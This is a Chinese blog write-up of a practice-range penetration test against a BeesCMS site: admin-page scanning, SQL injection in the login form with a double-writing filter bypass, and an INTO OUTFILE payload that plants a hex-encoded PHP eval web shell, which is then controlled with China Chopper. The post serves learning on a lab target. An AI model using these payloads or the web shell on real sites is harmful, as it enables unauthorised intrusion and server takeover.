发布于2022年10月15日3年前 前言 自己刚开始接触渗透测试,于是想找一些综合型的靶场来练练手,自己搭建没有那种感觉,于是找到了一个叫墨者学院的网站,上面的靶场还是很多的,而且大多数贴合实战,我喜欢! 今天,我们来玩一个BeesCMS网站。 文章如有抄袭或不足,请指出,我会继续改进的。 话不多说,直接开始 普普通通的一个网站,刚开始没什么思路,御剑先扫描一波: 发现了疑似后台的URLadmin/login.php,访问一下后台: 有验证码,看起来好像不能爆破,这里windows7火狐浏览器访问正常,而Kali Firefox访问却是: 不过不影响我们BP抓包: 这里先搁置一下。 尝试首页文章SQL注入 看首页文章,有?id,尝试注入。 SQLmap注入无果: 尝试绕过依旧无果: 说到注入,此时的我想到后台,于是我开始尝试在后台测试SQL注入。 后台SQL注入 在win7里面在此尝试注入,在用户名后面写上单引号,发现抱错: 终于找到了转机!继续尝试SQL注入。 尝试1Payloadadmin' union select 1,2,3,4,5#: 发现union,select被过滤,心里有点慌,尝试双写绕过admin' ununionion selselectect 1,2,3,4,5# 再次尝试更改payload:admin' un union ion seleselectct 1,2,3,4,5#: 尝试往里面写木马,根据题目的提示得出payloadadmin' uni union on selselectect 1,2,3,4,0x3c3f70687020406576616c28245f504f53545b636d645d293b3f3e in into outoutfilefile '/var/www/html/shell.php'#注意这里的木马需要用HEX加密,不然无法写入(木马连接口令CMD): shell文件写进去了,然后我们用菜刀连接一下: 木马连接成功,在根目录下发现key.txt,同时发现是LINUX服务器,打开后即可发现我们要获取的key文件。 至此,网站已经被沦陷,黑客攻击成功。 后记 此次渗透的要点: 御剑后台扫描 SQL注入写入木马 常见的关键字过滤Bypass 菜刀连接木马技术 坑很多,大家可以把BeesCMS搭建在自己的本地虚拟服务器上面复现,愿每一次渗透都能找到更优秀的自己,文章如有不足之处,请私信我。
创建帐户或登录后发表意见